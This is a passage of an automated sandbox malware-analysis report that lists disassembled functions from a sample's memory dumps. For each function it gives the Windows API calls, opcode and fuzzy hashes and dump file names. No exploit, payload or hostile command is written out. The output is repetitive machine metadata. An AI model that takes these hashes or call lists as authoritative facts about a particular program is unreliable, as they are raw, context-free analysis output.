                                                                                                                        • API String ID: 4274043533-0
                                                                                                                        • Opcode ID: 5a6baa277fae88b4ff92753e1469bfbcffbc14ae63057bf15158abcb4d58f147
                                                                                                                        • Instruction ID: 05463be20ef9bcd4797004ef27566f8b5546a5a16b849f6359c5b44b4bc22853
                                                                                                                        • Opcode Fuzzy Hash: 5a6baa277fae88b4ff92753e1469bfbcffbc14ae63057bf15158abcb4d58f147
                                                                                                                        • Instruction Fuzzy Hash: C32118B5901209AFCB04DFA9C8459DEBBF8EF58310F1481A9E905A7351EB75AA04CBA1
                                                                                                                        Function 00AE6880 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AE68D4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AE68E9
                                                                                                                        • _malloc.LIBCMT ref: 00AE6911
                                                                                                                        • _memmove.LIBCMT ref: 00AE691C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$Exception@8Throw_memmove_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3173045489-0
                                                                                                                        • Opcode ID: 089c5bc5e652b78dae8837269e13a66588db9450a9b935bc1c7783cf697a8f03
                                                                                                                        • Instruction ID: 574fa89e9e52c9b7a6690877854b6129234adc5a51759ea5935aac22a24bca89
                                                                                                                        • Opcode Fuzzy Hash: 089c5bc5e652b78dae8837269e13a66588db9450a9b935bc1c7783cf697a8f03
                                                                                                                        • Instruction Fuzzy Hash: D7116D76A002049FD714EF98D985EAAB7E8EF58700F1088AEE919D7742D670ED04CBA1
                                                                                                                        Function 00AE8BD0 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C11
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C1B
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C25
                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 00AE8C37
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CriticalDeleteSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 688834588-0
                                                                                                                        • Opcode ID: a36e5f5b49573efed53cbba9983af27ab273ce33413f68a0dcdaf12697a09abf
                                                                                                                        • Instruction ID: 3f4dbaa0829bf8eef9ab123321cf06c031efd5c5babca1498dc59fc820f7bfa3
                                                                                                                        • Opcode Fuzzy Hash: a36e5f5b49573efed53cbba9983af27ab273ce33413f68a0dcdaf12697a09abf
                                                                                                                        • Instruction Fuzzy Hash: 76116DB6A04645ABC710DB6ADC80F5AF7FCFB49710F104519E819D3740DB78E9048A61
                                                                                                                        Function 00B248B0 Relevance: 6.1, APIs: 4, Instructions: 65registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?), ref: 00B248F5
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B24936
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3231578192-0
                                                                                                                        • Opcode ID: a67797b65a18104f834293a3eede0f3ae3d55dacefb75116acfd4eb9b2f063cf
                                                                                                                        • Instruction ID: 527b9cae6610dbad6067b87f67f7fda2338b0aa472682376b26dc200aa9b672e
                                                                                                                        • Opcode Fuzzy Hash: a67797b65a18104f834293a3eede0f3ae3d55dacefb75116acfd4eb9b2f063cf
                                                                                                                        • Instruction Fuzzy Hash: 63110872901228ABCB22DF55DC94AEAB7BCFB49710F0041D9F509A7150DBB45F858FA0
                                                                                                                        Function 00B30B30 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B30B4C
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 00B30B5C
                                                                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 00B30B75
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30B92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseFullHandleImageNameOpenQueryThreadWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2863166696-0
                                                                                                                        • Opcode ID: 66346b8bfe6400009949ec21a1ccea0cf8bae0c675aad2deb8a42b445560fd7a
                                                                                                                        • Instruction ID: 4102644f9df5e341f4409e7c6a9631c3b1a1d7029fac7605579e81d486e4dbfa
                                                                                                                        • Opcode Fuzzy Hash: 66346b8bfe6400009949ec21a1ccea0cf8bae0c675aad2deb8a42b445560fd7a
                                                                                                                        • Instruction Fuzzy Hash: 01018472100209BFDB10DF55DC94DABB7ACEF48755B108059F908C7280EBB0DE048BA0
                                                                                                                        Function 00B481B6 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                        • Instruction ID: d0c2efa0b28ffc14ae9294efad0321d42c03c7bbd1e73baeb07f3e763fb9d4b7
                                                                                                                        • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                        • Instruction Fuzzy Hash: 4A117B3644014ABBCF125E84DC55CEE3FA2FB1A350B588895FA2858030DB32CAB1FB81
                                                                                                                        Function 00B12540 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00B12561
                                                                                                                        • SetRect.USER32(?,?,?,?,?), ref: 00B12579
                                                                                                                        • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00B12590
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00B12598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$RectText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034337308-0
                                                                                                                        • Opcode ID: 901ef63654895dc844edef772f21d603b04ae4f6c52cd4a289c7f525a091b376
                                                                                                                        • Instruction ID: 231f88dd3473892e036a9d7ea8536b39163de34cc9046c9b11a1b08620e5a141
                                                                                                                        • Opcode Fuzzy Hash: 901ef63654895dc844edef772f21d603b04ae4f6c52cd4a289c7f525a091b376
                                                                                                                        • Instruction Fuzzy Hash: F101E172601209BBDB00DF99DD45FAF73ACEF49710F104159FA05E7190DAB4AD018BA5
                                                                                                                        Function 00B00BA0 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,75BF73E0,?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BA5
                                                                                                                        • GetVersion.KERNEL32(?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BC0
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BD7
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B00C19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$ExitProcessVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3002118274-0
                                                                                                                        • Opcode ID: ca068dc85652f6aaf9d8a42b3f3f56bb5e50c43bb438596cd3de605a563cf73d
                                                                                                                        • Instruction ID: 3aa712abae2732eb7511b9c544cbfd0608ae4585fcf4ba988b18599ca32b7d12
                                                                                                                        • Opcode Fuzzy Hash: ca068dc85652f6aaf9d8a42b3f3f56bb5e50c43bb438596cd3de605a563cf73d
                                                                                                                        • Instruction Fuzzy Hash: 6F01FB742112099FEB10BF64EC89FAA7BECEB053A8F044156FD04872E1EB759D81C765
                                                                                                                        Function 00B04260 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00B04276
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B04283
                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00B04292
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?), ref: 00B042AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MoveParentPointsRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 868478971-0
                                                                                                                        • Opcode ID: de2cab2e3cabf69c9e0a1707c7d14a4c9a05a6c863a968fc3db8e66da0189724
                                                                                                                        • Instruction ID: 5601d840045697080e4da7fd3271bcdf05f75f29fa4ffc2eb301a90581e7411e
                                                                                                                        • Opcode Fuzzy Hash: de2cab2e3cabf69c9e0a1707c7d14a4c9a05a6c863a968fc3db8e66da0189724
                                                                                                                        • Instruction Fuzzy Hash: 61014B71601258AFDB01DFA4DD09DBF77BCEB89610F004059FA0693290DE74AE01CBB2
                                                                                                                        Function 00B4A6AD Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(02771C40,00B5FE6A,?,00000000,?,00B601A1,00000000,00B83950,0000000C,00B5B82D,?,00000000,?), ref: 00B4A6B0
                                                                                                                        • __malloc_crt.LIBCMT ref: 00B4A6DF
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4A6EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 237123855-0
                                                                                                                        • Opcode ID: 0d5c96c900aa5e0f7c75153a4c4d138b7b068a698cd120be7538e1e78e195470
                                                                                                                        • Instruction ID: d1561e0361c642fe67ac2814d843cbc48562fbd312bdac62dbf2756629a1921e
                                                                                                                        • Opcode Fuzzy Hash: 0d5c96c900aa5e0f7c75153a4c4d138b7b068a698cd120be7538e1e78e195470
                                                                                                                        • Instruction Fuzzy Hash: B8F082775451106A8F317734BC4A8A766A8DBD636131F44D6F401C3154FA718F81A6A2
                                                                                                                        Function 00B0B080 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0B08E
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00B8C2FC,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B098
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0B8
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2905768538-0
                                                                                                                        • Opcode ID: 1ba0b0b50055f85a769e4df558fd73aeae14767cb4c149d7ec1e5caaf18f26ef
                                                                                                                        • Instruction ID: dfb58eef7c22ae92f71a280599f5614ad443c901a53d062a158718f5af5376ee
                                                                                                                        • Opcode Fuzzy Hash: 1ba0b0b50055f85a769e4df558fd73aeae14767cb4c149d7ec1e5caaf18f26ef
                                                                                                                        • Instruction Fuzzy Hash: 1DF06D76211218AFCB11DF54EC44CAABBACFF95352B1041ABF901C7290EF75A909CBE5
                                                                                                                        Function 00AFC620 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00002328,?,?,00AE3B1B), ref: 00AFC643
                                                                                                                        • SetEvent.KERNEL32(?,?,?,00AE3B1B), ref: 00AFC649
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?,?,00AE3B1B), ref: 00AFC658
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00AE3B1B), ref: 00AFC65E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait$CloseEventHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1408678129-0
                                                                                                                        • Opcode ID: 32bafb0c25975347596464d57ae14203fd222909c50ca6bb057abfd699c317f9
                                                                                                                        • Instruction ID: c9e35d8edb9f632f99a301dd78bdd39198da0c7ba71020d5d263296e37737a12
                                                                                                                        • Opcode Fuzzy Hash: 32bafb0c25975347596464d57ae14203fd222909c50ca6bb057abfd699c317f9
                                                                                                                        • Instruction Fuzzy Hash: 6CF054712047049BC324DB69C844A26F7E9AF9CB10B04490DE28A876D1DAF9F8408B64
                                                                                                                        Function 00AF4620 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF4695
                                                                                                                        • _memmove.LIBCMT ref: 00AF46E6
                                                                                                                          • Part of subcall function 00AF3770: std::_Xinvalid_argument.LIBCPMT ref: 00AF378A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                        • Opcode ID: bf91ec08f2098eccb341d9d8da46b7f718d8e047e5dfff3b6b2d2487f2d365ba
                                                                                                                        • Instruction ID: def8bf9e2113ddb0cd4ef44be026fbe98d858638748981615d44fd3dd67de1ec
                                                                                                                        • Opcode Fuzzy Hash: bf91ec08f2098eccb341d9d8da46b7f718d8e047e5dfff3b6b2d2487f2d365ba
                                                                                                                        • Instruction Fuzzy Hash: 3631B5323006185BD764AEDDE88097BF7E9EFAA765B20052BF641C7751C7719C4087A4
                                                                                                                        Function 00AF34B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 256744135-2556327735
                                                                                                                        • Opcode ID: 1af3d20da82bbab002c8957455ce80453de42a0325a553038e2b9bf033a079e7
                                                                                                                        • Instruction ID: bd54ea3b256904796d6b277e6bd6272ece4af44d51afbb7828c5b5a6757f9ec7
                                                                                                                        • Opcode Fuzzy Hash: 1af3d20da82bbab002c8957455ce80453de42a0325a553038e2b9bf033a079e7
                                                                                                                        • Instruction Fuzzy Hash: 30318F333042088B8F249E9DE88087AF3EAEFD5712320491FF642C7650DB31EE4487A4
                                                                                                                        Function 00AEB110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AE99A0: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE99C2
                                                                                                                          • Part of subcall function 00AE99A0: LoadLibraryW.KERNEL32(?), ref: 00AE9A06
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPreDeviceInstall), ref: 00AE9A20
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(00000000,WdfPostDeviceInstall), ref: 00AE9A2D
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPreDeviceRemove), ref: 00AE9A3A
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPostDeviceRemove), ref: 00AE9A47
                                                                                                                          • Part of subcall function 00AE99A0: FreeLibrary.KERNEL32(00000000,?,WdfPostDeviceRemove,?,WdfPreDeviceRemove,?,WdfPreDeviceInstall), ref: 00AE9A69
                                                                                                                          • Part of subcall function 00AE9BE0: wvsprintfW.USER32(?,?,?), ref: 00AE9C0B
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00AEB1B7
                                                                                                                        Strings
                                                                                                                        • Error. predeviceInstall failed, e=%d, xrefs: 00AEB180
                                                                                                                        • Error loading wdfCoInstaller, xrefs: 00AEB147
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
